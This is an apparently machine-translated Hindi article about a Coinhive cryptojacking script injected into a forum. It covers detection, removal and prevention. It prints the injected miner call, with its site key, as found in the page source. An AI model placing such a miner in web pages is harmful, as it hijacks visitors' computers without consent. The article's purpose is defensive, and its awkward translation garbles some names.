एक वेबसाइट बनाने कि खान Cryptocurrency | जावास्क्रिप्ट खान ट्यूटोरियल
विषयसूची:
मैं अपनी वेबसाइट पर स्क्रिप्ट का उपयोग कर वेबसाइट मालिकों के बारे में पढ़ रहा हूं जो विज़िटर के कंप्यूटर के सीपीयू का उपयोग करते समय उनकी वेबसाइट पर जाते हैं। विचार उनकी सामग्री का मुद्रीकरण करना है - और इसलिए विज्ञापनों का उपयोग करने के बजाय, वे ब्राउज़र में चलने वाली एक स्क्रिप्ट का उपयोग करते हैं और क्रिप्टोकुरेंसी में उपयोगकर्ता के कंप्यूटर संसाधनों का उपयोग करते हैं। लेकिन मुझे लगता था कि केवल वेबसाइट मालिकों ने इसे डिज़ाइन द्वारा किया था - मैंने कभी कल्पना नहीं की है कि हैकर वेबसाइटों को हैक कर देंगे और स्क्रिप्ट को अन्य वेबसाइटों पर धक्का देंगे और अपने आगंतुकों को सीपीयू का इस्तेमाल अपने लिए पैसा बनाने के लिए करेंगे। लेकिन ऐसा लगता है कि अब क्या हो रहा है!
सिक्काइव क्रिप्टो-खनन स्क्रिप्ट
कल जब मैंने हमारे टीडब्ल्यूसी फोरम का दौरा किया, जो वीबुलेटिन सॉफ्टवेयर पर चलता है, तो मेरे सुरक्षा सॉफ्टवेयर ने इस चेतावनी को फेंक दिया:
// coinhive dot com /lib/coinhive.js ऑब्जेक्ट फ़ाइल का पता चला, अवरुद्ध डाउनलोड
मैं आम तौर पर हर रोज मंच पर जाता हूं और मैंने इसे पहले दिन नहीं देखा था। तो मुझे लगता है कि यह रात के दौरान कुछ समय हुआ था, मेरा समय, जब मैं सो रहा था।
मैं मंच के लिए vBulletin सॉफ्टवेयर का उपयोग करता हूं, और इसे नवीनतम संस्करण में अपडेट किया गया था। इसके अलावा, यह हमारे लिए आश्चर्यजनक था, क्योंकि TheWindowsClub.com डोमेन ऑनलाइन वेब खतरों और हमलों से खुद को बचाने के लिए सुकुरी वेब एंटीवायरस और फ़ायरवॉल का उपयोग करता है।
मेरे पीसी सुरक्षा सॉफ़्टवेयर ने दुर्भावनापूर्ण स्क्रिप्ट को चलने से सफलतापूर्वक रोक दिया मेरे विंडोज 10 कंप्यूटर पर। मैंने क्रोम और एज जैसे अन्य ब्राउज़रों के साथ जांच की, और परिणाम समान थे।
फोरम वेब पेज पर राइट-क्लिक करने और स्रोत कोड की जांच करने के बाद, मैंने पाया कि यह एक क्रिप्टोमिनर कोइनहेव की दुर्भावनापूर्ण लिपि थी।
यह दुर्भावनापूर्ण सिक्काइव जावास्क्रिप्ट है जो मेरे फोरम कोड में मिला था:
var miner = new coinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
वैसे भी, मैंने जो पहली चीज की थी वह मुझे लेना था फोरम डाउन और सुकुरी को सूचित करें।
सुकुरी लोगों ने सिक्काइव स्क्रिप्ट के फोरम को साफ कर दिया जो कुछ ही घंटों में मेरे मंच में धकेल गया था, और सभी ठीक था।
सिक्काइव
सिक्काइव ऑफर क्या है मोनरो क्रिप्टोकुरेंसी के लिए एक जावास्क्रिप्ट खनिक जो आप अपनी वेबसाइट में एम्बेड कर सकते हैं और वेबसाइट विज़िटर कंप्यूटर के सीपीयू का उपयोग अपने सिक्कों के लिए कर सकते हैं।
इसे क्रिप्टोजैकिंग कहा जाता है। इसमें क्रिप्टोकुरेंसी खनन के लिए उपयोगकर्ताओं के ब्राउज़र को हाइजैक करना शामिल है। कुछ वेबसाइट मालिक इसे पैसे कमाने के लिए स्वयं का उपयोग कर सकते हैं - लेकिन हमारे मामले में, इसे इंजेक्शन दिया गया था।
जब कोई उपयोगकर्ता संक्रमित साइट तक पहुंचता है, तो सिक्काइव जावास्क्रिप्ट निष्पादित करता है और उपयोगकर्ता के सीपीयू संसाधनों का उपयोग करने वाले मोनरो को खनन करता है। इससे सीपीयू थ्रॉटलिंग और पीड़ित मशीन की अप्रत्याशित प्रणाली दुर्घटना हो सकती है।
अब यदि आपका ब्राउज़र संक्रमित है तो आप देखेंगे कि आपका संसाधन उपयोग बढ़ जाएगा। ब्राउज़र बंद करें, और यह गिर जाएगी। उपयोगकर्ता अपने मशीन को गर्म कर सकता है, प्रशंसक तेजी से चल रहा है या बैटरी तेजी से बह रहा है।
मैंने अपने सहयोगी सौरभ मुखकर से अपने मैक का उपयोग करके अपने मंच पर जाने के लिए कहा और क्या हुआ। खैर, जब उसने सफारी के साथ मंच खोला तो उसका मैक कंप्यूटर भी प्रभावित हुआ! वह उन स्मार्ट मैक ओएसएक्स उपयोगकर्ताओं में से एक है जो अपने मैक के लिए एंटीवायरस सॉफ़्टवेयर का उपयोग करता है। मैक के लिए उनके अवास्ट एंटीवायरस ने दुर्भावनापूर्ण स्क्रिप्ट को सफलतापूर्वक चलने से रोक दिया।
सौरभ ने कहा,
सिक्काहेव मैलवेयर न केवल विंडोज पीसी को हाइजैक करता है बल्कि मैक भी है, क्योंकि यह ब्राउज़र आधारित जावास्क्रिप्ट संक्रमण है। यह अच्छा है कि मिथक में विश्वास नहीं है कि मैक को एंटीवायरस सॉफ़्टवेयर की आवश्यकता नहीं है, अन्यथा मेरी मशीन संक्रमित हो गई होगी और मेरा मैक किसी और के लिए सिक्कों को मंथन करना जारी रखेगा।
सिक्का को अपनी वेबसाइट को संक्रमित करने से रोकें
- अपनी वेबसाइट / फोरम पर किसी भी नल टेम्पलेट्स या प्लगइन्स का उपयोग न करें।
- अपने सीएमएस को नवीनतम संस्करण में अपडेट रखें।
- अपने होस्टिंग सॉफ्टवेयर को नियमित रूप से अपडेट करें (PHP, डेटाबेस, आदि …)।
- अपनी वेबसाइट को सकुरी, क्लाउडफ्लारे, वर्डफेंस इत्यादि जैसे वेब सुरक्षा प्रदाताओं के साथ सुरक्षित करें।
- अपने ब्लॉग को सुरक्षित करने के लिए बुनियादी सावधानी बरतें।
वेबसाइट से सिक्का हाइव हटाने [
सबसे पहले, आपको वेबमास्टर होना चाहिए संक्रमित वेबसाइट - या आपके पास व्यवस्थापकीय प्रमाण-पत्र हैं जो आपको सभी वेबसाइट फ़ाइलों तक पहुंच प्रदान करते हैं।
अब जब आपका एंटीवायरस सिक्काहेव संक्रमण का पता लगाता है, तो वेब पेज पर राइट-क्लिक करें और स्रोत कोड देखें चुनें। अगला प्रेस Ctrl + F और "सिक्काइव" की खोज करें।
एक बार जब आप दुर्भावनापूर्ण कोड के स्थान की पहचान कर लेंगे, तो आपको इसकी स्थिति देखना होगा - यह कहां स्थित है। अब आपको इसे मैन्युअल रूप से हटाने की जरूरत है। ऐसा करने के लिए, आपको अपने प्लेटफ़ॉर्म के कुछ कोडिंग ज्ञान की आवश्यकता है। आपको संक्रमित फ़ाइल / एस का पता लगाना होगा और मैन्युअल रूप से उपरोक्त स्क्रिप्ट को हटा देना होगा। यदि आप इसके बारे में निश्चित नहीं हैं, तो कृपया कुछ विशेषज्ञ से ऐसा करने के लिए कहें। चूंकि हम सुकुरी का उपयोग करते हैं, इसलिए हम उन्हें ऐसा करने देते हैं।
ऐसा करने के बाद, अपने सर्वर और ब्राउज़र कैश को साफ़ करें। यदि आप किसी भी कैश प्लगइन का उपयोग कर रहे हैं या मैक्ससीडीएन कहते हैं, तो उन कैश को भी साफ़ करें।
क्रिप्टो खनन स्क्रिप्ट के खिलाफ खुद को सुरक्षित रखें
क्रिप्टोकुरियां और ब्लॉकचेन तकनीक दुनिया भर में ले रही है। यह वैश्विक अर्थव्यवस्था पर प्रभाव पैदा कर रहा है और प्रौद्योगिकी व्यवधान भी पैदा कर रहा है। हर किसी ने इस तरह के एक आकर्षक बाजार पर ध्यान केंद्रित करना शुरू कर दिया है - और इसमें वेबसाइट हैकर्स भी शामिल हैं। रिटर्न में वृद्धि के रूप में, हमें उम्मीद करनी चाहिए कि ऐसी तकनीकों का दुरुपयोग किया जाएगा। यह किसी भी उभरती हुई तकनीक का अंधेरा पक्ष है।
हम क्या कर सकते हैं हर समय सर्वोत्तम संभव सावधानी बरतें। एक अच्छा सुरक्षा सॉफ़्टवेयर का उपयोग करने के अलावा, क्रोम या फ़ायरफ़ॉक्स एक्सटेंशन का उपयोग करें जो वेबसाइटों को आपके सीपीयू का उपयोग क्रिप्टोकुरेंसी में करने से रोकता है - या बेहतर अभी भी एंटी-वेबमाइनर का उपयोग करें जो आपके होस्ट फ़ाइल को संशोधित करके क्रिप्टोजैकिंग माइनिंग स्क्रिप्ट हमलों को रोक देगा। यह सभी ब्राउज़रों पर काम करता है। यदि आप मैक उपयोगकर्ता हैं, तो कृपया अपने कंप्यूटर के लिए एंटीवायरस सॉफ़्टवेयर भी प्राप्त करें।
प्रचुर मात्रा में सावधानी बरतने के मामले में, यदि आपको कभी लगता है कि आप किसी संक्रमित साइट पर गए हैं, तो यह आपके ब्राउज़र को साफ़ करना एक अच्छा विचार होगा कैश करें और अपनी मशीन को अपने एंटीवायरस सॉफ़्टवेयर के साथ-साथ एडवाक्लेनर के साथ स्कैन करें।
सुरक्षित रहें, सतर्क रहें!
अपनी वेबसाइट को बेहतर बनाने के लिए अपनी बाउंस दर का उपयोग करने के 5 तरीके
क्या विज़िटर आपकी वेबसाइट से भागते हैं जैसे ही वे वहां जाते हैं? इसे बदलने के लिए आप बहुत कुछ कर सकते हैं। यहां शुरू करने का तरीका बताया गया है।
अपनी वेबसाइट पर स्काइप बटन कैसे जोड़ें
आप ग्राहकों के साथ बेहतर बातचीत करने के लिए अपनी वेबसाइट पर एक स्काइप बटन जोड़ सकते हैं। ग्राहकों को अपनी वेबसाइट से सीधे कॉल या चैट करने दें
वेबसाइट पर सही वेबसाइट के बारे में दोस्तों के साथ चैट कैसे करें
